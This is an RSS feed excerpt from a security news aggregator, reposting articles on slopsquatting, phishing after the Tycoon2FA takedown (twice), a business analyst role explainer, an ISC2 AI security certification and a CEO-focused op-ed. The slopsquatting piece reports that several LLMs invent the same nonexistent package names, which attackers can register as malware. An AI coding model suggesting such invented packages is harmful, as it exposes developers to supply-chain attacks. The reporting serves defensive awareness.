<p class="wp-block-paragraph">According to the study, there are two reasons for this amount of conformity in the output of the models. First, models may learn the same incorrect package references from shared public training material, such as tutorials and documentation.</p>



<p class="wp-block-paragraph">Second, they may independently extrapolate plausible names from ecosystem conventions. In this way, they could produce names that look correct, even if they don’t actually exist.</p>



<p class="wp-block-paragraph">While Churilov’s research will worry CISOs and security-conscious developers, there is some relief. The research has not yet found any evidence that any of the remaining 53 names have been registered maliciously, nor used in an attack.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4200884/top-ais-invent-same-fake-pypl-and-npm-package-names.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Top AIs invent same fake PyPl and npm package names]]></title>
<description><![CDATA[Enterprise software developers continue to be in danger of falling victim to slopsquatting, where AI coding tools hallucinate the existence of nonexistent libraries and hackers create malicious packages in response.



The top AI coding tools are remarkably consistent in their hallucinations: Res...]]></description>
<link>https://tsecurity.de/de/3691310/ai-nachrichten/top-ais-invent-same-fake-pypl-and-npm-package-names/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691310/ai-nachrichten/top-ais-invent-same-fake-pypl-and-npm-package-names/</guid>
<pubDate>Fri, 24 Jul 2026 12:51:25 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Enterprise software developers continue to be in danger of falling victim to slopsquatting, where AI coding tools hallucinate the existence of nonexistent libraries and hackers create malicious packages in response.</p>



<p class="wp-block-paragraph">The top AI coding tools are remarkably consistent in their hallucinations: Researcher Aleksandr Churilov found the same 127 fake package names generated by five different LLMs.</p>



<p class="wp-block-paragraph"><a href="https://www.csoonline.com/article/3961304/ai-hallucinations-lead-to-new-cyber-threat-slopsquatting.html">Slopsquatting is a relatively new form of malware attack</a> that involves the creation of malicious packages in response to the hallucinations of AI coding tools, causing the malicious packages to be incorporated into legitimate applications.</p>



<p class="wp-block-paragraph">Churilov set out his findings in a research paper, <a href="https://arxiv.org/abs/2605.17062" target="_blank" rel="noreferrer noopener">The Range Shrinks, the Threat Remains: Re-evaluating LLM Package Hallucinations on the 2026 Frontier-Model Cohort</a>, which is yet to be peer-reviewed. He found 127 hallucinated package names were shared across Claude Sonnet 4.6, Claude Haiku 4.5, GPT-5.4-mini, Gemini 2.5 Pro, and DeepSeek V3.2.</p>



<p class="wp-block-paragraph"> As of April this year, 53 of those names — 41 on the PyPI software repository and 12 on npm —are still available for registration.</p>



<p class="wp-block-paragraph">According to the study, there are two reasons for this amount of conformity in the output of the models. First, models may learn the same incorrect package references from shared public training material, such as tutorials and documentation.</p>



<p class="wp-block-paragraph">Second, they may independently extrapolate plausible names from ecosystem conventions. In this way, they could produce names that look correct, even if they don’t actually exist.</p>



<p class="wp-block-paragraph">While Churilov’s research will worry CISOs and security-conscious developers, there is some relief. The research has not yet found any evidence that any of the remaining 53 names have been registered maliciously, nor used in an attack.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Email threats changed after the Tycoon2FA take-down]]></title>
<description><![CDATA[Traditional phishing techniques are in decline as a result of the disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.



“Phishing volume linked to the platform fell 92% from pre-disruption aver...]]></description>
<link>https://tsecurity.de/de/3691276/it-nachrichten/email-threats-changed-after-the-tycoon2fa-take-down/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691276/it-nachrichten/email-threats-changed-after-the-tycoon2fa-take-down/</guid>
<pubDate>Fri, 24 Jul 2026 12:33:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional phishing techniques are in decline as a result of the <a href="https://www.csoonline.com/article/4140890/microsoft-leads-takedown-of-tycoon2fa-phishing-service-infrastructure.html">disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform</a>, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.</p>



<p class="wp-block-paragraph">“Phishing volume linked to the platform fell 92% from pre-disruption averages, including QR code phishing and CAPTCHA-gated phishing both declining from their March highs,” the company wrote in <a href="https://www.microsoft.com/en-us/security/blog/2026/07/23/email-threat-landscape-q2-2026-trends-and-insights/">the report</a>.</p>



<p class="wp-block-paragraph">The takedown reduced activity across multiple phishing categories, forcing attackers to shift to newer delivery methods.</p>



<p class="wp-block-paragraph">Riding this shift in were a few notable phishing campaigns, including an automated <a href="https://www.csoonline.com/article/575559/business-email-compromise-scams-take-new-dimension-with-multi-stage-attacks.html">business email compromise</a> (BEC) campaign that reached 42,000 organizations in under three hours, and a multi-stage phishing campaign that used nested email (EML) files, calendar invitations, and a Microsoft authentication redirect to deliver malware.</p>



<p class="wp-block-paragraph">To counter phishing attacks, Microsoft recommends blocking emails containing known bad URLs/ subject fields, enabling password-less authentication methods, or moving to <a href="https://www.csoonline.com/article/4176814/security-experts-caution-mfa-alone-can-no-longer-stop-threat-actors.html">MFA</a> for accounts that still require passwords.</p>



<h2 class="wp-block-heading">Tycoon2FA disruption sent attackers exploring</h2>



<p class="wp-block-paragraph">The take-down of <a href="https://www.csoonline.com/article/4100393/hybrid-2fa-phishing-kits-are-making-attacks-harder-to-detect.html">Tycoon2FA</a> forced its operators to abandon portions of their infrastructure and rework hosting, domain registrations, and delivery mechanisms.</p>



<p class="wp-block-paragraph">“After falling 15% in March and another 22% in April, Tycoon2FA-linked phishing volume dropped 74% in May to just 1.5 million messages, then fell another 20% in June to 1.2 million, by far the lowest monthly volumes observed in at least a year,” Microsoft said.</p>



<p class="wp-block-paragraph">The decline extended to QR Code <a href="https://www.csoonline.com/article/3557585/attackers-are-using-qr-codes-sneakily-crafted-in-ascii-and-blob-urls-in-phishing-emails.html">lures</a> and fake CAPTCHA <a href="https://www.csoonline.com/article/3829416/fake-captcha-attacks-are-increasing-say-experts.html">pages</a>, two phishing techniques in which Tycoon2FA accounted for 12% and 14% of industry activity in June, respectively. This indicated that the platform’s customer base had not been able to migrate to a replacement infrastructure.</p>



<p class="wp-block-paragraph">But cutting off one head of the hacker hydra only gave rise to new tactics elsewhere.</p>



<p class="wp-block-paragraph">The adaptation came in the form of using Microsoft <a href="https://www.csoonline.com/article/4160858/attackers-abuse-microsoft-teams-to-impersonate-the-it-helpdesk-in-a-new-enterprise-intrusion-playbook.html">Teams as a social engineering channel</a>. Attackers established conversations to build trust before attempting credential theft or delivering malicious payloads. “Teams-based phishing volume climbed steadily throughout Q2, with the average number of detected attacks rising 19% from March to April, holding roughly flat into May (+1%), then increasing another 10% into June,” Microsoft said.</p>



<p class="wp-block-paragraph">Microsoft also observed a highly automated BEC campaign that reached over 67,000 users using scripted emails, Amazon Simple Email Service (SES), and engagement tracking, alongside a separate phishing campaign targeting 107,000 users that abused Microsoft’s authentication flow and trusted cloud services, including Teams archive recording and ICS calendar invite, to disguise malware delivery behind legitimate infrastructure.</p>



<h2 class="wp-block-heading">Phishing changes but the defense doesn’t</h2>



<p class="wp-block-paragraph">While QR Code and Captcha-based phishing attacks dropped significantly in the second quarter, business email compromise (BEC) charted jumped 121% between March and April, before dropping down again in May.</p>



<p class="wp-block-paragraph">QR Code phishing represented 8.3 million attacks in June 2026, down from a peak of 18.7 million in March. Similarly, Captcha-gated phishing fell from 12 million attacks in March to 2.2 million in June.</p>



<p class="wp-block-paragraph">BEC attacks hit 9 million in March, falling to 3.9 million in June.</p>



<p class="wp-block-paragraph">But even as these phishing classics lost momentum and newer techniques emerged, Microsoft’s defensive advice remained rooted in the basics. It noted organizations should complement email filtering with phishing-resistant authentication such as passkeys and phishing-resistant <a href="https://www.csoonline.com/article/3535222/mfa-adoption-is-catching-up-but-is-not-quite-there.html">MFA</a> to reduce the effectiveness of credential theft campaigns.</p>



<p class="wp-block-paragraph">The company also recommended strengthening Exchange Online Protection and Microsoft Defender for Office 365 with capabilities such as Safe links and Zero-hour Auto Purge (ZAP), in which malicious emails already delivered to mailboxes are removed before they are read, alongside enforcing password-less authentication methods like Windows Hello, <a href="https://www.csoonline.com/article/4040128/fido-undermined.html">FIDO </a>keys, and Microsoft Authenticator.</p>



<p class="wp-block-paragraph">Microsoft concluded its report with a list of indicators of compromise (IoCs) from the threats observed in the quarter to support detection efforts.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.csoonline.com/article/4201146/tycoon2fa-takedown-reshapes-the-phishing-landscape.html">CSO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tycoon2FA takedown reshapes the phishing landscape]]></title>
<description><![CDATA[Traditional phishing techniques are in decline as a result of the disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.



“Phishing volume linked to the platform fell 92% from pre-disruption aver...]]></description>
<link>https://tsecurity.de/de/3691257/it-security-nachrichten/tycoon2fa-takedown-reshapes-the-phishing-landscape/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691257/it-security-nachrichten/tycoon2fa-takedown-reshapes-the-phishing-landscape/</guid>
<pubDate>Fri, 24 Jul 2026 12:26:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional phishing techniques are in decline as a result of the <a href="https://www.csoonline.com/article/4140890/microsoft-leads-takedown-of-tycoon2fa-phishing-service-infrastructure.html">disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform</a>, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.</p>



<p class="wp-block-paragraph">“Phishing volume linked to the platform fell 92% from pre-disruption averages, including QR code phishing and CAPTCHA-gated phishing both declining from their March highs,” the company wrote in <a href="https://www.microsoft.com/en-us/security/blog/2026/07/23/email-threat-landscape-q2-2026-trends-and-insights/">the report</a>.</p>



<p class="wp-block-paragraph">The takedown reduced activity across multiple phishing categories, forcing attackers to shift to newer delivery methods.</p>



<p class="wp-block-paragraph">Riding this shift in were a few notable phishing campaigns, including an automated <a href="https://www.csoonline.com/article/575559/business-email-compromise-scams-take-new-dimension-with-multi-stage-attacks.html">business email compromise</a> (BEC) campaign that reached 42,000 organizations in under three hours, and a multi-stage phishing campaign that used nested email (EML) files, calendar invitations, and a Microsoft authentication redirect to deliver malware.</p>



<p class="wp-block-paragraph">To counter phishing attacks, Microsoft recommends blocking emails containing known bad URLs/ subject fields, enabling password-less authentication methods, or moving to <a href="https://www.csoonline.com/article/4176814/security-experts-caution-mfa-alone-can-no-longer-stop-threat-actors.html">MFA</a> for accounts that still require passwords.</p>



<h2 class="wp-block-heading">Tycoon2FA disruption sent attackers exploring</h2>



<p class="wp-block-paragraph">The take-down of <a href="https://www.csoonline.com/article/4100393/hybrid-2fa-phishing-kits-are-making-attacks-harder-to-detect.html">Tycoon2FA</a> forced its operators to abandon portions of their infrastructure and rework hosting, domain registrations, and delivery mechanisms.</p>



<p class="wp-block-paragraph">“After falling 15% in March and another 22% in April, Tycoon2FA-linked phishing volume dropped 74% in May to just 1.5 million messages, then fell another 20% in June to 1.2 million, by far the lowest monthly volumes observed in at least a year,” Microsoft said.</p>



<p class="wp-block-paragraph">The decline extended to QR Code <a href="https://www.csoonline.com/article/3557585/attackers-are-using-qr-codes-sneakily-crafted-in-ascii-and-blob-urls-in-phishing-emails.html">lures</a> and fake CAPTCHA <a href="https://www.csoonline.com/article/3829416/fake-captcha-attacks-are-increasing-say-experts.html">pages</a>, two phishing techniques in which Tycoon2FA accounted for 12% and 14% of industry activity in June, respectively. This indicated that the platform’s customer base had not been able to migrate to a replacement infrastructure.</p>



<p class="wp-block-paragraph">But cutting off one head of the hacker hydra only gave rise to new tactics elsewhere.</p>



<p class="wp-block-paragraph">The adaptation came in the form of using Microsoft <a href="https://www.csoonline.com/article/4160858/attackers-abuse-microsoft-teams-to-impersonate-the-it-helpdesk-in-a-new-enterprise-intrusion-playbook.html">Teams as a social engineering channel</a>. Attackers established conversations to build trust before attempting credential theft or delivering malicious payloads. “Teams-based phishing volume climbed steadily throughout Q2, with the average number of detected attacks rising 19% from March to April, holding roughly flat into May (+1%), then increasing another 10% into June,” Microsoft said.</p>



<p class="wp-block-paragraph">Microsoft also observed a highly automated BEC campaign that reached over 67,000 users using scripted emails, Amazon Simple Email Service (SES), and engagement tracking, alongside a separate phishing campaign targeting 107,000 users that abused Microsoft’s authentication flow and trusted cloud services, including Teams archive recording and ICS calendar invite, to disguise malware delivery behind legitimate infrastructure.</p>



<h2 class="wp-block-heading">Phishing changes but the defense doesn’t</h2>



<p class="wp-block-paragraph">While QR Code and Captcha-based phishing attacks dropped significantly in the second quarter, business email compromise (BEC) charted jumped 121% between March and April, before dropping down again in May.</p>



<p class="wp-block-paragraph">QR Code phishing represented 8.3 million attacks in June 2026, down from a peak of 18.7 million in March. Similarly, Captcha-gated phishing fell from 12 million attacks in March to 2.2 million in June.</p>



<p class="wp-block-paragraph">BEC attacks hit 9 million in March, falling to 3.9 million in June.</p>



<p class="wp-block-paragraph">But even as these phishing classics lost momentum and newer techniques emerged, Microsoft’s defensive advice remained rooted in the basics. It noted organizations should complement email filtering with phishing-resistant authentication such as passkeys and phishing-resistant <a href="https://www.csoonline.com/article/3535222/mfa-adoption-is-catching-up-but-is-not-quite-there.html">MFA</a> to reduce the effectiveness of credential theft campaigns.</p>



<p class="wp-block-paragraph">The company also recommended strengthening Exchange Online Protection and Microsoft Defender for Office 365 with capabilities such as Safe links and Zero-hour Auto Purge (ZAP), in which malicious emails already delivered to mailboxes are removed before they are read, alongside enforcing password-less authentication methods like Windows Hello, <a href="https://www.csoonline.com/article/4040128/fido-undermined.html">FIDO </a>keys, and Microsoft Authenticator.</p>



<p class="wp-block-paragraph">Microsoft concluded its report with a list of indicators of compromise (IoCs) from the threats observed in the quarter to support detection efforts.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is a business analyst? A key role for business-IT efficiency]]></title>
<description><![CDATA[What is a business analyst?



Business analysts (BAs) are responsible for bridging the gap between IT and the business using data analytics to assess processes, determine requirements, and deliver data-driven recommendations and reports to executives and stakeholders.



BAs engage with business...]]></description>
<link>https://tsecurity.de/de/3691228/it-security-nachrichten/what-is-a-business-analyst-a-key-role-for-business-it-efficiency/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691228/it-security-nachrichten/what-is-a-business-analyst-a-key-role-for-business-it-efficiency/</guid>
<pubDate>Fri, 24 Jul 2026 12:09:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading">What is a business analyst?</h2>



<p class="wp-block-paragraph">Business analysts (BAs) are responsible for bridging the gap between IT and the business using <a href="https://www.cio.com/article/191313/what-is-data-analytics-analyzing-and-managing-data-for-decisions.html">data analytics</a> to assess processes, determine requirements, and deliver data-driven recommendations and reports to executives and stakeholders.</p>



<p class="wp-block-paragraph">BAs engage with business leaders and users to understand how data-driven changes to process, products, services, software, and hardware can improve efficiencies and add value. They must articulate those ideas but also balance them against what’s technologically feasible and financially and functionally reasonable. Depending on the role, a business analyst might work with data sets to improve products, hardware, tools, software, services, or process.</p>



<p class="wp-block-paragraph">The International Institute of Business Analysis (IIBA), a nonprofit professional association, considers the business analyst an agent of change, and says that <a href="https://www.cio.com/article/191157/what-is-business-analytics-using-data-to-predict-business-outcomes.html">business analysis</a> is a disciplined approach to introduce and manage change to organizations, whether they’re for-profit businesses, governments, or nonprofits.</p>



<h2 class="wp-block-heading">Impact of AI on business analyst role</h2>



<p class="wp-block-paragraph">As AI becomes commonplace in the tech industry, business analysts are embracing it as a tool to automate repetitive work in the role. AI tools can be used for workflow and diagramming, process mapping, data analysis, and to automate meeting minutes and transcribe meetings where requirements are established, all designed to speed up the process of analyzing data, creating visuals, and transcribing and writing user stories and acceptance criteria.</p>



<p class="wp-block-paragraph">AI tools can also help identify patterns, insights, and unique data points that might go unnoticed by humans, and allow a faster time to generate insights for organizations.</p>



<p class="wp-block-paragraph">Of course, as with all AI tools, they still require humans to oversee prompts, scripting, and evaluate AI outputs to ensure they’re accurate and valid. While they can’t replace the work of BAs, AI can help them spend more time on thoughtful analysis and decision making, rather than mundane tasks such as gathering and summarizing data, and querying.</p>



<h2 class="wp-block-heading">Business analyst job description</h2>



<p class="wp-block-paragraph">BAs are responsible for creating new models that support business decisions by working closely with finance and IT teams to establish initiatives and strategies aimed at improving revenue and optimizing costs. They need a strong understanding of regulatory and reporting requirements, and have plenty of experience in forecasting, budgeting, and financial analysis combined with knowing KPIs, according to Robert Half Technology.</p>



<p class="wp-block-paragraph">According to Robert Half, a BA’s job description typically includes budgeting and forecasting, planning and monitoring, variance analysis, pricing, reporting, and creating a detailed business analysis in an effort to outline problems, opportunities, and solutions for a business. It also says BAs should be able to define business requirements and report them back to stakeholders.</p>



<p class="wp-block-paragraph">Since BAs are tasked with prioritizing technical and functional requirements, identifying what clients want, and determining what’s feasible to deliver, the role requires a deep understanding of systems, how they function, who’ll need to be involved, and the necessary steps to get everyone on board.  </p>



<p class="wp-block-paragraph">The role is constantly evolving, especially as companies rely more on data to advise business operations. Every company has different issues that a business analyst can address, whether it’s dealing with outdated legacy systems, changing technologies, broken processes, poor client or customer satisfaction, or large, siloed organizations.</p>



<h2 class="wp-block-heading">Business analyst skills</h2>



<p class="wp-block-paragraph">The BA position requires both hard and soft skills, as they need to know how to pull, analyze, and report data trends, share that information with others, and apply it to business goals and needs.</p>



<p class="wp-block-paragraph">Not all BAs need a background in IT if they have a general understanding of how systems, products, and tools work. Alternatively, some have strong IT backgrounds and less experience in business, but are interested in shifting away from IT into this hybrid role, which often acts as a communicator between the business and IT sides of the organization. So having extensive experience in either area can be beneficial for BAs.</p>



<p class="wp-block-paragraph"><a href="https://www.iiba.org/career-resources/new-to-business-analysis/" target="_blank" rel="noreferrer noopener">According to the IIBA</a>, some of the most important skills and experience for a business analyst are:</p>



<ul class="wp-block-list">
<li>Oral and written communication skills</li>



<li>Interpersonal, organizational, facilitation, and consultative skills</li>



<li>Analytical thinking and problem solving</li>



<li>Being detail-oriented and able to deliver a high level of accuracy</li>



<li>Knowledge of business structure</li>



<li>Stakeholder and cost-benefit analysis</li>



<li>Processes modeling</li>



<li>Understanding networks, databases, and other technologies</li>
</ul>



<p class="wp-block-paragraph">For a more in-depth look at what it takes to succeed as a business analyst, click <a href="https://www.cio.com/article/189108/essential-traits-of-elite-business-analysts.html">here</a>.</p>



<h2 class="wp-block-heading">Business analyst salary</h2>



<p class="wp-block-paragraph">The average annual salary for an IT business analyst is $80,692, according to <a href="https://www.payscale.com/research/US/Job=Business_Analyst%2C_IT/Salary" target="_blank" rel="noreferrer noopener">data from PayScale</a>. The highest paid BAs are in New York, where the average salary is 14% higher than the national average. Dallas, Texas, is second, with reported salaries 6.4% higher than the national average, closely followed by Washington, D.C., where salaries are 6.3% higher than the national average.</p>



<p class="wp-block-paragraph">Some skills are in higher demand than others, with the potential to boost salary. According to Payscale, these are associated with higher BA salaries. These skills, and the amount they can boost your salary, include:</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td>Skills</td><td>Salary Boost</td></tr><tr><td>ScrumMaster</td><td>44%</td></tr><tr><td>Microsoft Azure</td><td>30%</td></tr><tr><td>Supply Chain</td><td>27%</td></tr><tr><td>Oracle eBusiness Suite</td><td>25%</td></tr><tr><td>Master Data Management (SAP MDM)</td><td>24%</td></tr><tr><td>SAP Sales and Distribution (SAP SD)</td><td>24%</td></tr><tr><td>Product Support</td><td>18%</td></tr><tr><td>Microsoft Dynamics GP</td><td>18%</td></tr><tr><td>SAP Quality Management (SAP QM)</td><td>18%</td></tr><tr><td>Workday Software</td><td>15%</td></tr></tbody></table> </div></figure>



<p class="wp-block-paragraph">For tips on boosting your salary, click <a href="https://www.cio.com/article/189510/7-steps-business-analysts-can-take-to-earn-more.html">here</a>.</p>



<h2 class="wp-block-heading">Business analyst certifications</h2>



<p class="wp-block-paragraph">Although business analysis is a relatively new discipline in IT, a handful of organizations already offer certifications to help boost your résumé and prove your merit as an analyst. Organizations such as the IIBA, IQBBA, IREB, and PMI each offer their own tailored certifications for business analysis. These include:</p>



<ul class="wp-block-list">
<li>IIBA <a href="https://www.cio.com/article/189169/ecba-certification-an-entry-level-credential-for-business-analysts.html">Entry Certificate in Business Analysis (ECBA)</a></li>



<li>IIBA Certification of Competency in Business Analysis (CCBA)</li>



<li>IIBA Certified Business Analysis Professional (CBAP)</li>



<li>IIBA Agile Analysis Certification (AAC)</li>



<li>IQBBA Certified Foundation Level Business Analyst (CFLBA)</li>



<li>IREB Certified Professional for Requirements Engineering (CPRE)</li>



<li>PMI Professional in Business Analysis (PBA)</li>



<li>Certified Analytics Professional (CAP)</li>
</ul>



<p class="wp-block-paragraph">For more information about how to earn one of these certifications — and how much they cost — click <a href="https://www.cio.com/article/228834/6-business-analyst-certifications-to-advance-your-analytics-career.html">here</a>.</p>



<h2 class="wp-block-heading">Business analytics tools and software</h2>



<p class="wp-block-paragraph">BAs typically rely on software such as Microsoft’s Excel, PowerPoint, and Access, as well as SQL, Google Analytics, and Tableau. These tools help BAs collect and sort data, create graphs, write documents, and design visualizations to explain findings. You won’t necessarily need programming or database skills for a BA position, but if you already have these skills, they won’t hurt. The type of software and tools you’ll need to use, however, will depend on your job title and what the organization requires.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ISC2 seeks input from IT pros for AI security certification]]></title>
<description><![CDATA[ISC2 has begun developing a vendor-neutral AI security certification aimed at cybersecurity professionals working to secure AI systems and manage emerging AI risks.



The nonprofit organization, best known for the CISSP certification, says it is seeking volunteers worldwide to help define the kn...]]></description>
<link>https://tsecurity.de/de/3691227/it-security-nachrichten/isc2-seeks-input-from-it-pros-for-ai-security-certification/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691227/it-security-nachrichten/isc2-seeks-input-from-it-pros-for-ai-security-certification/</guid>
<pubDate>Fri, 24 Jul 2026 12:09:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.isc2.org/" target="_blank" rel="noreferrer noopener">ISC2</a> has begun developing a <a href="https://www.isc2.org/new-ai-certification#AI%20Security%20Certification%20Frequently%20Asked%20Questions" target="_blank" rel="noreferrer noopener">vendor-neutral AI security certification</a> aimed at cybersecurity professionals working to secure AI systems and manage emerging AI risks.</p>



<p class="wp-block-paragraph">The nonprofit organization, best known for the <a href="https://www.isc2.org/certifications/cissp" target="_blank" rel="noreferrer noopener">CISSP certification</a>, says it is seeking volunteers worldwide to help define the knowledge and <a href="https://www.networkworld.com/article/3566827/global-cybersecurity-talent-gap-widens.html" target="_blank">skills</a> that will shape the new credential. While ISC2 has not finalized the certification domains, the <a href="https://www.prnewswire.com/news-releases/isc2-begins-developing-its-ai-security-certification-and-opens-call-for-volunteers-worldwide-302825622.html?tc=eml_cleartime" target="_blank" rel="noreferrer noopener">certification</a> is expected to address both technical AI security and governance topics, with a pilot exam planned before the end of 2026.</p>



<p class="wp-block-paragraph">According to <a href="https://www.linkedin.com/in/caseymarks/">Casey Marks</a>, ISC2 chief operating officer, feedback from cybersecurity practitioners led ISC2 to conclude that AI security had grown beyond expanding AI content within existing certifications.</p>



<p class="wp-block-paragraph">“AI has reached a tipping point,” Marks says. “AI no longer is just another tool; instead, it has fundamentally changed the cybersecurity practice itself.”</p>



<p class="wp-block-paragraph">ISC2 already includes <a href="https://www.networkworld.com/article/4196919/isc2-ai-raises-accountability-demands-for-cybersecurity-teams.html" target="_blank">AI-related content in certifications</a> including CISSP and <a href="https://www.isc2.org/certifications/CCSP" target="_blank" rel="noreferrer noopener">CCSP</a>, but Marks says practitioners have identified new responsibilities and risks that extend beyond those programs. “Enterprise security teams are currently grappling with significant knowledge gaps, particularly around securing model architectures against new vulnerabilities like prompt injection, data poisoning, and model inversion,” Marks adds.</p>



<p class="wp-block-paragraph">Organizations are working to understand emerging governance frameworks, including the NIST AI Risk Management Framework and ISO/IEC 42001, while adapting traditional application security and security operations workflows to AI systems, he says.</p>



<p class="wp-block-paragraph">ISC2 has not finalized the certification domains, but Marks says the organization expects the credential to address both technical controls and governance practices for <a href="https://www.networkworld.com/article/4174188/ai-reshapes-cybersecurity-workforce-priorities-as-it-teams-brace-for-new-risks.html" target="_blank">securing AI systems and managing AI risk</a>. The certification will use ISC2’s established certification development process, which relies on cybersecurity practitioners to define job roles, develop exam content, and validate competencies.</p>



<p class="wp-block-paragraph">Marks says ISC2 will continue to update the certification through ongoing input from cybersecurity professionals, in addition to its regular certification review process.</p>



<p class="wp-block-paragraph">The organization is also determining which professionals the certification will target. Marks says AI security responsibilities are emerging across security architecture, risk management, security operations, software development security, governance and compliance, communication and network security, and security assessment and testing. ISC2 says the certification will reflect how those roles are evolving.</p>



<p class="wp-block-paragraph">For organizations that are building AI security programs now, Marks recommends using existing AI training resources, adopting established governance frameworks, creating cross-functional AI security working groups, and participating in the certification development process.</p>



<p class="wp-block-paragraph">Marks says ISC2 expects AI knowledge to become part of most cybersecurity roles while a more specialized AI security discipline continues to develop. He says organizations will increasingly need professionals with foundational AI security knowledge, as well as specialists in areas such as adversarial machine learning, model architectures, and AI data pipelines.</p>



<p class="wp-block-paragraph">Looking ahead, Marks says he expects AI security expertise to evolve into both a foundational skill for cybersecurity professionals and a specialized discipline of its own.</p>



<p class="wp-block-paragraph">“At this time, we are seeing a hybrid evolution occurring in real time: AI security is simultaneously becoming a baseline expectation for all security roles, while also carving out a dedicated, highly specialized discipline,” Marks says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[3 cybersecurity issues that should keep every CEO awake at night]]></title>
<description><![CDATA[For years, I have been saying that cybersecurity is no longer a technology problem. It has become a business leadership challenge.



Yet, despite record levels of spending, ever-growing security teams, increasingly sophisticated technologies and a constant stream of new regulations, organization...]]></description>
<link>https://tsecurity.de/de/3691226/it-security-nachrichten/3-cybersecurity-issues-that-should-keep-every-ceo-awake-at-night/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691226/it-security-nachrichten/3-cybersecurity-issues-that-should-keep-every-ceo-awake-at-night/</guid>
<pubDate>Fri, 24 Jul 2026 12:09:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For years, I have been saying that cybersecurity is no longer a technology problem. It has become a business leadership challenge.</p>



<p class="wp-block-paragraph">Yet, despite record levels of spending, ever-growing security teams, increasingly sophisticated technologies and a constant stream of new regulations, organizations continue to suffer major cyber incidents with alarming regularity. Every week seems to bring news of another ransomware attack, supply chain compromise or data breach affecting organizations that many would have assumed were well protected.</p>



<p class="wp-block-paragraph">The obvious conclusion is that we are asking the wrong questions.</p>



<p class="wp-block-paragraph">Too many executive teams remain preoccupied with the latest threat actor, the newest security product the CISO wants to buy or the latest vulnerability making headlines. Those issues matter, but they are not what should be keeping CEOs awake at night.</p>



<p class="wp-block-paragraph">In my view, there are three far more fundamental issues that deserve the attention of every chief executive.</p>



<h2 class="wp-block-heading">1. Corporate complexity, and the widening gap between business leadership and cybersecurity reality</h2>



<p class="wp-block-paragraph">Perhaps the biggest cybersecurity risk facing large organizations today is not technical at all.</p>



<p class="wp-block-paragraph">It is the growing disconnect between executive perception and operational reality.</p>



<p class="wp-block-paragraph">Many boards genuinely believe their organizations are reasonably well protected. They receive regular dashboards showing improving maturity scores, increasing compliance levels, falling vulnerability counts and reassuring traffic-light reports.</p>



<p class="wp-block-paragraph">Unfortunately, cyber attackers do not read dashboards.</p>



<p class="wp-block-paragraph">Behind those executive reports often lies an increasingly complex technology landscape, thousands of unmanaged digital assets, ageing infrastructure, rampant shadow IT, fragmented ownership, inconsistent governance and security teams struggling to keep pace with relentless business change.</p>



<p class="wp-block-paragraph">The problem is rarely a lack of effort.</p>



<p class="wp-block-paragraph">It is that corporate complexity has reached a level where traditional governance mechanisms are no longer capable of providing an accurate picture of organizational resilience.</p>



